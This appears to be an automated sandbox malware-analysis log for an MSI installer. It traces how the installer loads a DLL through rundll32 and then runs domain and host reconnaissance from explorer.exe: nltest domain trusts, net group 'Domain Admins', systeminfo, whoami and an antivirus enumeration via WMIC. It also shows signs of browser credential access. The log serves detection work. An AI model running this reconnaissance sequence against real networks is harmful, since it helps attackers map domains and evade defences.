            Source: C:\Windows\explorer.exeCode function: 9_2_0E6AB3709_2_0E6AB370
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6263589_2_0E626358
            Source: C:\Windows\explorer.exeCode function: 9_2_0E62E31C9_2_0E62E31C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6683EC9_2_0E6683EC
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6973A09_2_0E6973A0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E65E0749_2_0E65E074
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6260789_2_0E626078
            Source: C:\Windows\explorer.exeCode function: 9_2_0E68A0489_2_0E68A048
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6460389_2_0E646038
            Source: C:\Windows\explorer.exeCode function: 9_2_0E67F0189_2_0E67F018
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6670C09_2_0E6670C0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6901549_2_0E690154
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6941349_2_0E694134
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6801149_2_0E680114
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6501FB9_2_0E6501FB
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6811CC9_2_0E6811CC
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6551C09_2_0E6551C0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E67318C9_2_0E67318C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E63D19C9_2_0E63D19C
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001E51AE11484 appears 39 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E62D5A8 appears 35 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E62E160 appears 147 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E647D54 appears 31 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E62D6E8 appears 52 times
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: String function: 00CD3292 appears 66 times
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: String function: 00CD325F appears 103 times
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: String function: 00CD3790 appears 39 times
            Source: avutil.dll.1.drStatic PE information: Number of sections : 13 > 10
            Source: fes.msiBinary or memory string: OriginalFilenameviewer.exeF vs fes.msi
            Source: fes.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs fes.msi
            Source: classification engineClassification label: mal100.spre.bank.troj.spyw.evad.winMSI@69/31@7/3
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CB3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,3_2_00CB3860
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CB4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,3_2_00CB4BA0
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CB45B0 LoadResource,LockResource,SizeofResource,3_2_00CB45B0
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML1751.tmpJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
            Source: C:\Windows\System32\rundll32.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFF0876073A5D49207.TMPJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
            Source: Tilu.tmp.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fes.msi"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 499D87EFF8C8F588A32BFEB435A5201B
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI17D3.tmp "C:\Windows\Installer\MSI17D3.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net config workstation
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c whoami /groups
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 499D87EFF8C8F588A32BFEB435A5201BJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI17D3.tmp "C:\Windows\Installer\MSI17D3.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\avutil.dll, DLLMainJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMainJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /allJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfoJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trustsJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trustsJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domainJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /allJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domainJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:ListJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net config workstationJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installedJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c whoami /groupsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net.exeSection loaded: browcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net.exeSection loaded: browcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
